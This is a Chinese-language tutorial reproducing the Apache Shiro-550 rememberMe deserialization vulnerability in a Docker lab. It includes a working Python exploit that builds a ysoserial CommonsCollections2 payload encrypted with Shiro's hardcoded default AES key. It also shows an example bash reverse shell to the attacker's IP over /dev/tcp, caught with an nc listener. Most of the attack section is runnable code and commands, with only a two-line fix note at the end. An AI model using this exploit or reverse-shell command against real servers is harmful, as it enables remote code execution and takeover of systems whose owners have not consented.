Shiro简介:
shiro(Java安全框架):apache shiro 是一个强大且易用的java安全框架框架,执行身份验证 、授权、密码和会话管理。使用shiro的易于理解的API,可以快速、轻松的获得任何应用程序,从最小的的移动应用程序到最大的网络和企业应用程序。apache shiro在java的权限及安全验证框架中占有重要的一席之地,在它编号为550的issue中爆出过严重的java反序列化漏洞。下面我来教大家复现这个漏洞。
漏洞描述:
官方issues通告:shiro的issues
产生漏洞的原因:
shiro对rememeberme的cookie做了加密处理,shiro在cookieremembermeManaer类中将cookie中的rememberme字段内容分别进行序列化,aes加密,base64编码操作,在识别身份的时候,需要对cookie里的rememberme字段解密,根据加密的顺序,不难指导解密的顺序为:
获取rememberme cookie
base64解码
解密aes
反序列化
但是,其中aes加密的密钥key被硬编码在代码里,意味着每个人通过源代码都能拿到aes加密的密钥,因此,攻击者构造一个恶意的对象,并且将其序列化,aes加密,base64编码后,作为cookie的rememberme字段发送,shiro将rememberme进行解密并且反序列化,最终造成了反序列化漏洞。
漏洞复现:
目前有两个复现方式:
1:从GitHub上获取apahce shiro存在漏洞的源代码:
2:使用docker镜像复现
使用docker镜像复现漏洞:
获取docker镜像:
docker pull medicean/vulapps:s_shiro_1
docker run -d -p youport:8080 medicean/vulapps:s_shiro_1
安装ysoserial的jar文件:
git clone https://github.com/frohoff/ysoserial.git *作者更新了,下载的jar包的版本号可能不一样,以下的命令请注意版本号的修改*
cd ysoserial
mvn package -DskipTests cp ysoserial-0.0.5-SNAPSHOT-all.jar /tmp
注意:kali不自带mvn命令,需要自己下载:linux下载mvn命令
然后访问ip地址+youport 环境搭建成功
然后我们开始抓包:
点击account page页面进去后是要求你登录,你选择页面上提示的账号密码登录,记得登录时勾选下方的rememeber选项。店家抓包。
第一个包放过,选择接受返回包,然后将这个页面的数据发送到repter里面
我们的主要目标就是这个里面的cookie里的rememeber参数
poc准备:
*注意ysoserial的版本号,下载的什么版本填什么版本*
下列poc代码复制到本地命名为:shiro_poc.py
# pip install pycrypto
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.5-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
with open("/tmp/payload.cookie", "w") as fpw:
print("rememberMe={}".format(payload.decode()), file=fpw)
python3执行该脚本:
使用方式:python3 shiro_poc.py "你的命令"
例示:python3 shiro_poc.py“ bash -i>&/ dev / tcp you ip / port 0>&1”
然后我们会在执行脚本的目录下发现payload.cookie文件,查看文件复制其中的cookie值到之前抓包的数据包内替换其cookie值。
本地开启nc监听:
nc -lvvp端口
反弹shell
修复方案:
1、升级shiro版本
2、修改文件中硬编码的密钥